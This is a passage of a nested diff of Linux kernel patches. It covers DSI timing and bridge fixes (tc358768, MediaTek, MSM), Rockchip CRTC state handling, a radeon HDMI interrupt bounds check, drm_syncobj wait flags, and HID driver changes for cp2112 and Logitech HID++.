++	raw_val = tc358768_ns_to_cnt(60 + tc358768_ps_to_ns(18 * ui_ps),
++				     hsbyteclk_ps) - 4;
+ 	val = clamp(raw_val, 0, 15);
+-	dev_dbg(priv->dev, "THS_TRAILCNT: 0x%x\n", val);
++	dev_dbg(dev, "THS_TRAILCNT: %u\n", val);
+ 	tc358768_write(priv, TC358768_THS_TRAILCNT, val);
+ 
+ 	val = BIT(0);
+@@ -793,16 +799,17 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 		val |= BIT(i + 1);
+ 	tc358768_write(priv, TC358768_HSTXVREGEN, val);
+ 
+-	if (!(mode_flags & MIPI_DSI_CLOCK_NON_CONTINUOUS))
+-		tc358768_write(priv, TC358768_TXOPTIONCNTRL, 0x1);
++	tc358768_write(priv, TC358768_TXOPTIONCNTRL,
++		       (mode_flags & MIPI_DSI_CLOCK_NON_CONTINUOUS) ? 0 : BIT(0));
+ 
+ 	/* TXTAGOCNT[26:16] RXTASURECNT[10:0] */
+-	val = tc358768_to_ns((lptxcnt + 1) * dsibclk_nsk * 4);
+-	val = tc358768_ns_to_cnt(val, dsibclk_nsk) / 4 - 1;
+-	val2 = tc358768_ns_to_cnt(tc358768_to_ns((lptxcnt + 1) * dsibclk_nsk),
+-				  dsibclk_nsk) - 2;
++	val = tc358768_ps_to_ns((lptxcnt + 1) * hsbyteclk_ps * 4);
++	val = tc358768_ns_to_cnt(val, hsbyteclk_ps) / 4 - 1;
++	dev_dbg(dev, "TXTAGOCNT: %u\n", val);
++	val2 = tc358768_ns_to_cnt(tc358768_ps_to_ns((lptxcnt + 1) * hsbyteclk_ps),
++				  hsbyteclk_ps) - 2;
++	dev_dbg(dev, "RXTASURECNT: %u\n", val2);
+ 	val = val << 16 | val2;
+-	dev_dbg(priv->dev, "BTACNTRL1: 0x%x\n", val);
+ 	tc358768_write(priv, TC358768_BTACNTRL1, val);
+ 
+ 	/* START[0] */
+@@ -813,43 +820,43 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 		tc358768_write(priv, TC358768_DSI_EVENT, 0);
+ 
+ 		/* vact */
+-		tc358768_write(priv, TC358768_DSI_VACT, mode->vdisplay);
++		tc358768_write(priv, TC358768_DSI_VACT, vm.vactive);
+ 
+ 		/* vsw */
+-		tc358768_write(priv, TC358768_DSI_VSW,
+-			       mode->vsync_end - mode->vsync_start);
++		tc358768_write(priv, TC358768_DSI_VSW, vm.vsync_len);
++
+ 		/* vbp */
+-		tc358768_write(priv, TC358768_DSI_VBPR,
+-			       mode->vtotal - mode->vsync_end);
++		tc358768_write(priv, TC358768_DSI_VBPR, vm.vback_porch);
+ 
+ 		/* hsw * byteclk * ndl / pclk */
+-		val = (u32)div_u64((mode->hsync_end - mode->hsync_start) *
+-				   ((u64)priv->dsiclk / 4) * priv->dsi_lanes,
+-				   mode->clock * 1000);
++		val = (u32)div_u64(vm.hsync_len *
++				   (u64)hsbyteclk * priv->dsi_lanes,
++				   vm.pixelclock);
+ 		tc358768_write(priv, TC358768_DSI_HSW, val);
+ 
+ 		/* hbp * byteclk * ndl / pclk */
+-		val = (u32)div_u64((mode->htotal - mode->hsync_end) *
+-				   ((u64)priv->dsiclk / 4) * priv->dsi_lanes,
+-				   mode->clock * 1000);
++		val = (u32)div_u64(vm.hback_porch *
++				   (u64)hsbyteclk * priv->dsi_lanes,
++				   vm.pixelclock);
+ 		tc358768_write(priv, TC358768_DSI_HBPR, val);
+ 	} else {
+ 		/* Set event mode */
+ 		tc358768_write(priv, TC358768_DSI_EVENT, 1);
+ 
+ 		/* vact */
+-		tc358768_write(priv, TC358768_DSI_VACT, mode->vdisplay);
++		tc358768_write(priv, TC358768_DSI_VACT, vm.vactive);
+ 
+ 		/* vsw (+ vbp) */
+ 		tc358768_write(priv, TC358768_DSI_VSW,
+-			       mode->vtotal - mode->vsync_start);
++			       vm.vsync_len + vm.vback_porch);
++
+ 		/* vbp (not used in event mode) */
+ 		tc358768_write(priv, TC358768_DSI_VBPR, 0);
+ 
+ 		/* (hsw + hbp) * byteclk * ndl / pclk */
+-		val = (u32)div_u64((mode->htotal - mode->hsync_start) *
+-				   ((u64)priv->dsiclk / 4) * priv->dsi_lanes,
+-				   mode->clock * 1000);
++		val = (u32)div_u64((vm.hsync_len + vm.hback_porch) *
++				   (u64)hsbyteclk * priv->dsi_lanes,
++				   vm.pixelclock);
+ 		tc358768_write(priv, TC358768_DSI_HSW, val);
+ 
+ 		/* hbp (not used in event mode) */
+@@ -860,11 +867,12 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 	tc358768_write(priv, TC358768_DSI_HACT, hact);
+ 
+ 	/* VSYNC polarity */
+-	if (!(mode->flags & DRM_MODE_FLAG_NVSYNC))
+-		tc358768_update_bits(priv, TC358768_CONFCTL, BIT(5), BIT(5));
++	tc358768_update_bits(priv, TC358768_CONFCTL, BIT(5),
++			     (mode->flags & DRM_MODE_FLAG_PVSYNC) ? BIT(5) : 0);
++
+ 	/* HSYNC polarity */
+-	if (mode->flags & DRM_MODE_FLAG_PHSYNC)
+-		tc358768_update_bits(priv, TC358768_PP_MISC, BIT(0), BIT(0));
++	tc358768_update_bits(priv, TC358768_PP_MISC, BIT(0),
++			     (mode->flags & DRM_MODE_FLAG_PHSYNC) ? BIT(0) : 0);
+ 
+ 	/* Start DSI Tx */
+ 	tc358768_write(priv, TC358768_DSI_START, 0x1);
+@@ -894,7 +902,7 @@ static void tc358768_bridge_pre_enable(struct drm_bridge *bridge)
+ 
+ 	ret = tc358768_clear_error(priv);
+ 	if (ret) {
+-		dev_err(priv->dev, "Bridge pre_enable failed: %d\n", ret);
++		dev_err(dev, "Bridge pre_enable failed: %d\n", ret);
+ 		tc358768_bridge_disable(bridge);
+ 		tc358768_bridge_post_disable(bridge);
+ 	}
+diff --git a/drivers/gpu/drm/drm_syncobj.c b/drivers/gpu/drm/drm_syncobj.c
+index e592c5da70cee..da0145bc104a8 100644
+--- a/drivers/gpu/drm/drm_syncobj.c
++++ b/drivers/gpu/drm/drm_syncobj.c
+@@ -1015,7 +1015,8 @@ static signed long drm_syncobj_array_wait_timeout(struct drm_syncobj **syncobjs,
+ 		fence = drm_syncobj_fence_get(syncobjs[i]);
+ 		if (!fence || dma_fence_chain_find_seqno(&fence, points[i])) {
+ 			dma_fence_put(fence);
+-			if (flags & DRM_SYNCOBJ_WAIT_FLAGS_WAIT_FOR_SUBMIT) {
++			if (flags & (DRM_SYNCOBJ_WAIT_FLAGS_WAIT_FOR_SUBMIT |
++				     DRM_SYNCOBJ_WAIT_FLAGS_WAIT_AVAILABLE)) {
+ 				continue;
+ 			} else {
+ 				timeout = -EINVAL;
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+index 14ddfe3a6be77..7fb52a573436e 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_crtc.c
+@@ -402,6 +402,9 @@ static int mtk_crtc_ddp_hw_init(struct mtk_drm_crtc *mtk_crtc)
+ 		unsigned int local_layer;
+ 
+ 		plane_state = to_mtk_plane_state(plane->state);
++
++		/* should not enable layer before crtc enabled */
++		plane_state->pending.enable = false;
+ 		comp = mtk_drm_ddp_comp_for_plane(crtc, plane, &local_layer);
+ 		if (comp)
+ 			mtk_ddp_comp_layer_config(comp, local_layer,
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_plane.c b/drivers/gpu/drm/mediatek/mtk_drm_plane.c
+index 2f5e007dd3800..c4a0203d17e38 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_plane.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_plane.c
+@@ -157,9 +157,9 @@ static void mtk_plane_atomic_async_update(struct drm_plane *plane,
+ 	plane->state->src_y = new_state->src_y;
+ 	plane->state->src_h = new_state->src_h;
+ 	plane->state->src_w = new_state->src_w;
+-	swap(plane->state->fb, new_state->fb);
+ 
+ 	mtk_plane_update_new_state(new_state, new_plane_state);
++	swap(plane->state->fb, new_state->fb);
+ 	wmb(); /* Make sure the above parameters are set before update */
+ 	new_plane_state->pending.async_dirty = true;
+ 	mtk_drm_crtc_async_update(new_state->crtc, plane, state);
+diff --git a/drivers/gpu/drm/mediatek/mtk_dsi.c b/drivers/gpu/drm/mediatek/mtk_dsi.c
+index 9e1363c9fcdb4..3e74c7c1b89fa 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dsi.c
++++ b/drivers/gpu/drm/mediatek/mtk_dsi.c
+@@ -406,7 +406,7 @@ static void mtk_dsi_rxtx_control(struct mtk_dsi *dsi)
+ 	if (dsi->mode_flags & MIPI_DSI_CLOCK_NON_CONTINUOUS)
+ 		tmp_reg |= HSTX_CKLP_EN;
+ 
+-	if (!(dsi->mode_flags & MIPI_DSI_MODE_NO_EOT_PACKET))
++	if (dsi->mode_flags & MIPI_DSI_MODE_NO_EOT_PACKET)
+ 		tmp_reg |= DIS_EOT;
+ 
+ 	writel(tmp_reg, dsi->regs + DSI_TXRX_CTRL);
+@@ -483,7 +483,7 @@ static void mtk_dsi_config_vdo_timing(struct mtk_dsi *dsi)
+ 			  timing->da_hs_zero + timing->da_hs_exit + 3;
+ 
+ 	delta = dsi->mode_flags & MIPI_DSI_MODE_VIDEO_BURST ? 18 : 12;
+-	delta += dsi->mode_flags & MIPI_DSI_MODE_NO_EOT_PACKET ? 2 : 0;
++	delta += dsi->mode_flags & MIPI_DSI_MODE_NO_EOT_PACKET ? 0 : 2;
+ 
+ 	horizontal_frontporch_byte = vm->hfront_porch * dsi_tmp_buf_bpp;
+ 	horizontal_front_back_byte = horizontal_frontporch_byte + horizontal_backporch_byte;
+diff --git a/drivers/gpu/drm/msm/dsi/dsi.c b/drivers/gpu/drm/msm/dsi/dsi.c
+index 8a95c744972a1..e9036e4036bc6 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi.c
++++ b/drivers/gpu/drm/msm/dsi/dsi.c
+@@ -127,6 +127,7 @@ static void dsi_unbind(struct device *dev, struct device *master,
+ 	struct msm_drm_private *priv = dev_get_drvdata(master);
+ 	struct msm_dsi *msm_dsi = dev_get_drvdata(dev);
+ 
++	msm_dsi_tx_buf_free(msm_dsi->host);
+ 	priv->dsi[msm_dsi->id] = NULL;
+ }
+ 
+diff --git a/drivers/gpu/drm/msm/dsi/dsi.h b/drivers/gpu/drm/msm/dsi/dsi.h
+index 2a96b4fe7839f..6b239f77fca94 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi.h
++++ b/drivers/gpu/drm/msm/dsi/dsi.h
+@@ -123,6 +123,7 @@ int dsi_tx_buf_alloc_v2(struct msm_dsi_host *msm_host, int size);
+ void *dsi_tx_buf_get_6g(struct msm_dsi_host *msm_host);
+ void *dsi_tx_buf_get_v2(struct msm_dsi_host *msm_host);
+ void dsi_tx_buf_put_6g(struct msm_dsi_host *msm_host);
++void msm_dsi_tx_buf_free(struct mipi_dsi_host *mipi_host);
+ int dsi_dma_base_get_6g(struct msm_dsi_host *msm_host, uint64_t *iova);
+ int dsi_dma_base_get_v2(struct msm_dsi_host *msm_host, uint64_t *iova);
+ int dsi_clk_init_v2(struct msm_dsi_host *msm_host);
+diff --git a/drivers/gpu/drm/msm/dsi/dsi_host.c b/drivers/gpu/drm/msm/dsi/dsi_host.c
+index e20cd3dd2c6cc..a7c6e8a1754de 100644
+--- a/drivers/gpu/drm/msm/dsi/dsi_host.c
++++ b/drivers/gpu/drm/msm/dsi/dsi_host.c
+@@ -149,6 +149,7 @@ struct msm_dsi_host {
+ 
+ 	/* DSI 6G TX buffer*/
+ 	struct drm_gem_object *tx_gem_obj;
++	struct msm_gem_address_space *aspace;
+ 
+ 	/* DSI v2 TX buffer */
+ 	void *tx_buf;
+@@ -1127,8 +1128,10 @@ int dsi_tx_buf_alloc_6g(struct msm_dsi_host *msm_host, int size)
+ 	uint64_t iova;
+ 	u8 *data;
+ 
++	msm_host->aspace = msm_gem_address_space_get(priv->kms->aspace);
++
+ 	data = msm_gem_kernel_new(dev, size, MSM_BO_WC,
+-					priv->kms->aspace,
++					msm_host->aspace,
+ 					&msm_host->tx_gem_obj, &iova);
+ 
+ 	if (IS_ERR(data)) {
+@@ -1157,10 +1160,10 @@ int dsi_tx_buf_alloc_v2(struct msm_dsi_host *msm_host, int size)
+ 	return 0;
+ }
+ 
+-static void dsi_tx_buf_free(struct msm_dsi_host *msm_host)
++void msm_dsi_tx_buf_free(struct mipi_dsi_host *host)
+ {
++	struct msm_dsi_host *msm_host = to_msm_dsi_host(host);
+ 	struct drm_device *dev = msm_host->dev;
+-	struct msm_drm_private *priv;
+ 
+ 	/*
+ 	 * This is possible if we're tearing down before we've had a chance to
+@@ -1171,11 +1174,11 @@ static void dsi_tx_buf_free(struct msm_dsi_host *msm_host)
+ 	if (!dev)
+ 		return;
+ 
+-	priv = dev->dev_private;
+ 	if (msm_host->tx_gem_obj) {
+-		msm_gem_unpin_iova(msm_host->tx_gem_obj, priv->kms->aspace);
+-		drm_gem_object_put(msm_host->tx_gem_obj);
++		msm_gem_kernel_put(msm_host->tx_gem_obj, msm_host->aspace);
++		msm_gem_address_space_put(msm_host->aspace);
+ 		msm_host->tx_gem_obj = NULL;
++		msm_host->aspace = NULL;
+ 	}
+ 
+ 	if (msm_host->tx_buf)
+@@ -2014,7 +2017,6 @@ void msm_dsi_host_destroy(struct mipi_dsi_host *host)
+ 	struct msm_dsi_host *msm_host = to_msm_dsi_host(host);
+ 
+ 	DBG("");
+-	dsi_tx_buf_free(msm_host);
+ 	if (msm_host->workqueue) {
+ 		destroy_workqueue(msm_host->workqueue);
+ 		msm_host->workqueue = NULL;
+diff --git a/drivers/gpu/drm/radeon/evergreen.c b/drivers/gpu/drm/radeon/evergreen.c
+index 4f06356d9ce2e..f0ae087be914e 100644
+--- a/drivers/gpu/drm/radeon/evergreen.c
++++ b/drivers/gpu/drm/radeon/evergreen.c
+@@ -4821,14 +4821,15 @@ restart_ih:
+ 			break;
+ 		case 44: /* hdmi */
+ 			afmt_idx = src_data;
+-			if (!(afmt_status[afmt_idx] & AFMT_AZ_FORMAT_WTRIG))
+-				DRM_DEBUG("IH: IH event w/o asserted irq bit?\n");
+-
+ 			if (afmt_idx > 5) {
+ 				DRM_ERROR("Unhandled interrupt: %d %d\n",
+ 					  src_id, src_data);
+ 				break;
+ 			}
++
++			if (!(afmt_status[afmt_idx] & AFMT_AZ_FORMAT_WTRIG))
++				DRM_DEBUG("IH: IH event w/o asserted irq bit?\n");
++
+ 			afmt_status[afmt_idx] &= ~AFMT_AZ_FORMAT_WTRIG;
+ 			queue_hdmi = true;
+ 			DRM_DEBUG("IH: HDMI%d\n", afmt_idx + 1);
+diff --git a/drivers/gpu/drm/rockchip/cdn-dp-core.c b/drivers/gpu/drm/rockchip/cdn-dp-core.c
+index 8526dda919317..0b33c3a1e6e3b 100644
+--- a/drivers/gpu/drm/rockchip/cdn-dp-core.c
++++ b/drivers/gpu/drm/rockchip/cdn-dp-core.c
+@@ -1178,6 +1178,7 @@ static int cdn_dp_probe(struct platform_device *pdev)
+ 	struct cdn_dp_device *dp;
+ 	struct extcon_dev *extcon;
+ 	struct phy *phy;
++	int ret;
+ 	int i;
+ 
+ 	dp = devm_kzalloc(dev, sizeof(*dp), GFP_KERNEL);
+@@ -1218,9 +1219,19 @@ static int cdn_dp_probe(struct platform_device *pdev)
+ 	mutex_init(&dp->lock);
+ 	dev_set_drvdata(dev, dp);
+ 
+-	cdn_dp_audio_codec_init(dp, dev);
++	ret = cdn_dp_audio_codec_init(dp, dev);
++	if (ret)
++		return ret;
++
++	ret = component_add(dev, &cdn_dp_component_ops);
++	if (ret)
++		goto err_audio_deinit;
+ 
+-	return component_add(dev, &cdn_dp_component_ops);
++	return 0;
++
++err_audio_deinit:
++	platform_device_unregister(dp->audio_pdev);
++	return ret;
+ }
+ 
+ static int cdn_dp_remove(struct platform_device *pdev)
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_gem.c b/drivers/gpu/drm/rockchip/rockchip_drm_gem.c
+index 9426f7976d22e..10a4970ad2d8a 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_gem.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_gem.c
+@@ -39,7 +39,7 @@ static int rockchip_gem_iommu_map(struct rockchip_gem_object *rk_obj)
+ 
+ 	ret = iommu_map_sgtable(private->domain, rk_obj->dma_addr, rk_obj->sgt,
+ 				prot);
+-	if (ret < rk_obj->base.size) {
++	if (ret < (ssize_t)rk_obj->base.size) {
+ 		DRM_ERROR("failed to map buffer: size=%zd request_size=%zd\n",
+ 			  ret, rk_obj->base.size);
+ 		ret = -ENOMEM;
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+index 2e2e08f4359a8..ae8c532f7fc84 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+@@ -1606,7 +1606,8 @@ static struct drm_crtc_state *vop_crtc_duplicate_state(struct drm_crtc *crtc)
+ 	if (WARN_ON(!crtc->state))
+ 		return NULL;
+ 
+-	rockchip_state = kzalloc(sizeof(*rockchip_state), GFP_KERNEL);
++	rockchip_state = kmemdup(to_rockchip_crtc_state(crtc->state),
++				 sizeof(*rockchip_state), GFP_KERNEL);
+ 	if (!rockchip_state)
+ 		return NULL;
+ 
+@@ -1631,7 +1632,10 @@ static void vop_crtc_reset(struct drm_crtc *crtc)
+ 	if (crtc->state)
+ 		vop_crtc_destroy_state(crtc, crtc->state);
+ 
+-	__drm_atomic_helper_crtc_reset(crtc, &crtc_state->base);
++	if (crtc_state)
++		__drm_atomic_helper_crtc_reset(crtc, &crtc_state->base);
++	else
++		__drm_atomic_helper_crtc_reset(crtc, NULL);
+ }
+ 
+ #ifdef CONFIG_DRM_ANALOGIX_DP
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+index 3c05ce01f73b8..b233f52675dc4 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop2.c
+@@ -2075,30 +2075,15 @@ static const struct drm_crtc_helper_funcs vop2_crtc_helper_funcs = {
+ 	.atomic_disable = vop2_crtc_atomic_disable,
+ };
+ 
+-static void vop2_crtc_reset(struct drm_crtc *crtc)
+-{
+-	struct rockchip_crtc_state *vcstate = to_rockchip_crtc_state(crtc->state);
+-
+-	if (crtc->state) {
+-		__drm_atomic_helper_crtc_destroy_state(crtc->state);
+-		kfree(vcstate);
+-	}
+-
+-	vcstate = kzalloc(sizeof(*vcstate), GFP_KERNEL);
+-	if (!vcstate)
+-		return;
+-
+-	crtc->state = &vcstate->base;
+-	crtc->state->crtc = crtc;
+-}
+-
+ static struct drm_crtc_state *vop2_crtc_duplicate_state(struct drm_crtc *crtc)
+ {
+-	struct rockchip_crtc_state *vcstate, *old_vcstate;
++	struct rockchip_crtc_state *vcstate;
+ 
+-	old_vcstate = to_rockchip_crtc_state(crtc->state);
++	if (WARN_ON(!crtc->state))
++		return NULL;
+ 
+-	vcstate = kmemdup(old_vcstate, sizeof(*old_vcstate), GFP_KERNEL);
++	vcstate = kmemdup(to_rockchip_crtc_state(crtc->state),
++			  sizeof(*vcstate), GFP_KERNEL);
+ 	if (!vcstate)
+ 		return NULL;
+ 
+@@ -2116,6 +2101,20 @@ static void vop2_crtc_destroy_state(struct drm_crtc *crtc,
+ 	kfree(vcstate);
+ }
+ 
++static void vop2_crtc_reset(struct drm_crtc *crtc)
++{
++	struct rockchip_crtc_state *vcstate =
++		kzalloc(sizeof(*vcstate), GFP_KERNEL);
++
++	if (crtc->state)
++		vop2_crtc_destroy_state(crtc, crtc->state);
++
++	if (vcstate)
++		__drm_atomic_helper_crtc_reset(crtc, &vcstate->base);
++	else
++		__drm_atomic_helper_crtc_reset(crtc, NULL);
++}
++
+ static const struct drm_crtc_funcs vop2_crtc_funcs = {
+ 	.set_config = drm_atomic_helper_set_config,
+ 	.page_flip = drm_atomic_helper_page_flip,
+diff --git a/drivers/gpu/host1x/context.c b/drivers/gpu/host1x/context.c
+index 047696432eb21..93c0c532fe5af 100644
+--- a/drivers/gpu/host1x/context.c
++++ b/drivers/gpu/host1x/context.c
+@@ -34,10 +34,10 @@ int host1x_memory_context_list_init(struct host1x *host1x)
+ 	if (err < 0)
+ 		return 0;
+ 
+-	cdl->devs = kcalloc(err, sizeof(*cdl->devs), GFP_KERNEL);
++	cdl->len = err / 4;
++	cdl->devs = kcalloc(cdl->len, sizeof(*cdl->devs), GFP_KERNEL);
+ 	if (!cdl->devs)
+ 		return -ENOMEM;
+-	cdl->len = err / 4;
+ 
+ 	for (i = 0; i < cdl->len; i++) {
+ 		struct iommu_fwspec *fwspec;
+diff --git a/drivers/hid/hid-cp2112.c b/drivers/hid/hid-cp2112.c
+index 27cadadda7c9d..2770d964133d5 100644
+--- a/drivers/hid/hid-cp2112.c
++++ b/drivers/hid/hid-cp2112.c
+@@ -163,7 +163,6 @@ struct cp2112_device {
+ 	atomic_t read_avail;
+ 	atomic_t xfer_avail;
+ 	struct gpio_chip gc;
+-	struct irq_chip irq;
+ 	u8 *in_out_buffer;
+ 	struct mutex lock;
+ 
+@@ -1080,16 +1079,20 @@ static void cp2112_gpio_irq_mask(struct irq_data *d)
+ {
+ 	struct gpio_chip *gc = irq_data_get_irq_chip_data(d);
+ 	struct cp2112_device *dev = gpiochip_get_data(gc);
++	irq_hw_number_t hwirq = irqd_to_hwirq(d);
+ 
+-	__clear_bit(d->hwirq, &dev->irq_mask);
++	__clear_bit(hwirq, &dev->irq_mask);
++	gpiochip_disable_irq(gc, hwirq);
+ }
+ 
+ static void cp2112_gpio_irq_unmask(struct irq_data *d)
+ {
+ 	struct gpio_chip *gc = irq_data_get_irq_chip_data(d);
+ 	struct cp2112_device *dev = gpiochip_get_data(gc);
++	irq_hw_number_t hwirq = irqd_to_hwirq(d);
+ 
+-	__set_bit(d->hwirq, &dev->irq_mask);
++	gpiochip_enable_irq(gc, hwirq);
++	__set_bit(hwirq, &dev->irq_mask);
+ }
+ 
+ static void cp2112_gpio_poll_callback(struct work_struct *work)
+@@ -1159,8 +1162,6 @@ static unsigned int cp2112_gpio_irq_startup(struct irq_data *d)
+ 	struct gpio_chip *gc = irq_data_get_irq_chip_data(d);
+ 	struct cp2112_device *dev = gpiochip_get_data(gc);
+ 
+-	INIT_DELAYED_WORK(&dev->gpio_poll_worker, cp2112_gpio_poll_callback);
+-
+ 	if (!dev->gpio_poll) {
+ 		dev->gpio_poll = true;
+ 		schedule_delayed_work(&dev->gpio_poll_worker, 0);
+@@ -1175,7 +1176,12 @@ static void cp2112_gpio_irq_shutdown(struct irq_data *d)
+ 	struct gpio_chip *gc = irq_data_get_irq_chip_data(d);
+ 	struct cp2112_device *dev = gpiochip_get_data(gc);
+ 
+-	cancel_delayed_work_sync(&dev->gpio_poll_worker);
++	cp2112_gpio_irq_mask(d);
++
++	if (!dev->irq_mask) {
++		dev->gpio_poll = false;
++		cancel_delayed_work_sync(&dev->gpio_poll_worker);
++	}
+ }
+ 
+ static int cp2112_gpio_irq_type(struct irq_data *d, unsigned int type)
+@@ -1228,6 +1234,18 @@ err_desc:
+ 	return ret;
+ }
+ 
++static const struct irq_chip cp2112_gpio_irqchip = {
++	.name = "cp2112-gpio",
++	.irq_startup = cp2112_gpio_irq_startup,
++	.irq_shutdown = cp2112_gpio_irq_shutdown,
++	.irq_ack = cp2112_gpio_irq_ack,
++	.irq_mask = cp2112_gpio_irq_mask,
++	.irq_unmask = cp2112_gpio_irq_unmask,
++	.irq_set_type = cp2112_gpio_irq_type,
++	.flags = IRQCHIP_MASK_ON_SUSPEND | IRQCHIP_IMMUTABLE,
++	GPIOCHIP_IRQ_RESOURCE_HELPERS,
++};
++
+ static int cp2112_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ {
+ 	struct cp2112_device *dev;
+@@ -1337,17 +1355,8 @@ static int cp2112_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	dev->gc.can_sleep		= 1;
+ 	dev->gc.parent			= &hdev->dev;
+ 
+-	dev->irq.name = "cp2112-gpio";
+-	dev->irq.irq_startup = cp2112_gpio_irq_startup;
+-	dev->irq.irq_shutdown = cp2112_gpio_irq_shutdown;
+-	dev->irq.irq_ack = cp2112_gpio_irq_ack;
+-	dev->irq.irq_mask = cp2112_gpio_irq_mask;
+-	dev->irq.irq_unmask = cp2112_gpio_irq_unmask;
+-	dev->irq.irq_set_type = cp2112_gpio_irq_type;
+-	dev->irq.flags = IRQCHIP_MASK_ON_SUSPEND;
+-
+ 	girq = &dev->gc.irq;
+-	girq->chip = &dev->irq;
++	gpio_irq_chip_set_chip(girq, &cp2112_gpio_irqchip);
+ 	/* The event comes from the outside so no parent handler */
+ 	girq->parent_handler = NULL;
+ 	girq->num_parents = 0;
+@@ -1356,6 +1365,8 @@ static int cp2112_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	girq->handler = handle_simple_irq;
+ 	girq->threaded = true;
+ 
++	INIT_DELAYED_WORK(&dev->gpio_poll_worker, cp2112_gpio_poll_callback);
++
+ 	ret = gpiochip_add_data(&dev->gc, dev);
+ 	if (ret < 0) {
+ 		hid_err(hdev, "error registering gpio chip\n");
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index 8d0dad12b2d37..fa1c7e07e220b 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -31,11 +31,6 @@ MODULE_LICENSE("GPL");
+ MODULE_AUTHOR("Benjamin Tissoires <benjamin.tissoires@gmail.com>");
+ MODULE_AUTHOR("Nestor Lopez Casado <nlopezcasad@logitech.com>");
+ 
+-static bool disable_raw_mode;
+-module_param(disable_raw_mode, bool, 0644);
+-MODULE_PARM_DESC(disable_raw_mode,
+-	"Disable Raw mode reporting for touchpads and keep firmware gestures.");
+-
+ static bool disable_tap_to_click;
+ module_param(disable_tap_to_click, bool, 0644);
+ MODULE_PARM_DESC(disable_tap_to_click,
+@@ -71,7 +66,7 @@ MODULE_PARM_DESC(disable_tap_to_click,
+ /* bits 2..20 are reserved for classes */
+ /* #define HIDPP_QUIRK_CONNECT_EVENTS		BIT(21) disabled */
+ #define HIDPP_QUIRK_WTP_PHYSICAL_BUTTONS	BIT(22)
+-#define HIDPP_QUIRK_NO_HIDINPUT			BIT(23)
++#define HIDPP_QUIRK_DELAYED_INIT		BIT(23)
+ #define HIDPP_QUIRK_FORCE_OUTPUT_REPORTS	BIT(24)
+ #define HIDPP_QUIRK_UNIFYING			BIT(25)
+ #define HIDPP_QUIRK_HIDPP_WHEELS		BIT(26)
+@@ -88,8 +83,6 @@ MODULE_PARM_DESC(disable_tap_to_click,
+ 					 HIDPP_CAPABILITY_HIDPP20_HI_RES_SCROLL | \
+ 					 HIDPP_CAPABILITY_HIDPP20_HI_RES_WHEEL)
+ 
+-#define HIDPP_QUIRK_DELAYED_INIT		HIDPP_QUIRK_NO_HIDINPUT
+-
+ #define HIDPP_CAPABILITY_HIDPP10_BATTERY	BIT(0)
+ #define HIDPP_CAPABILITY_HIDPP20_BATTERY	BIT(1)
+ #define HIDPP_CAPABILITY_BATTERY_MILEAGE	BIT(2)
+@@ -1764,15 +1757,14 @@ static int hidpp_battery_get_property(struct power_supply *psy,
+ /* -------------------------------------------------------------------------- */
+ #define HIDPP_PAGE_WIRELESS_DEVICE_STATUS			0x1d4b
+ 
+-static int hidpp_set_wireless_feature_index(struct hidpp_device *hidpp)
++static int hidpp_get_wireless_feature_index(struct hidpp_device *hidpp, u8 *feature_index)
+ {
+ 	u8 feature_type;
+ 	int ret;
+ 
+ 	ret = hidpp_root_get_feature(hidpp,
+ 				     HIDPP_PAGE_WIRELESS_DEVICE_STATUS,
+-				     &hidpp->wireless_feature_index,
+-				     &feature_type);
++				     feature_index, &feature_type);
+ 
+ 	return ret;
+ }
+@@ -4006,6 +3998,13 @@ static void hidpp_connect_event(struct hidpp_device *hidpp)
+ 		}
+ 	}
+ 
++	if (hidpp->protocol_major >= 2) {
++		u8 feature_index;
++
++		if (!hidpp_get_wireless_feature_index(hidpp, &feature_index))
++			hidpp->wireless_feature_index = feature_index;
++	}
++
+ 	if (hidpp->name == hdev->name && hidpp->protocol_major >= 2) {
+ 		name = hidpp_get_device_name(hidpp);
+ 		if (name) {
+@@ -4044,7 +4043,7 @@ static void hidpp_connect_event(struct hidpp_device *hidpp)
+ 	if (hidpp->capabilities & HIDPP_CAPABILITY_HI_RES_SCROLL)
+ 		hi_res_scroll_enable(hidpp);
+ 
+-	if (!(hidpp->quirks & HIDPP_QUIRK_NO_HIDINPUT) || hidpp->delayed_input)
++	if (!(hidpp->quirks & HIDPP_QUIRK_DELAYED_INIT) || hidpp->delayed_input)
+ 		/* if the input nodes are already created, we can stop now */
+ 		return;
+ 
+@@ -4149,7 +4148,6 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	bool connected;
+ 	unsigned int connect_mask = HID_CONNECT_DEFAULT;
+ 	struct hidpp_ff_private_data data;
+-	bool will_restart = false;
+ 
+ 	/* report_fixup needs drvdata to be set before we call hid_parse */
+ 	hidpp = devm_kzalloc(&hdev->dev, sizeof(*hidpp), GFP_KERNEL);
+@@ -4190,11 +4188,6 @@ static int hidpp_probe(struct hid_device *hdev, const struct hid_device_id *id)
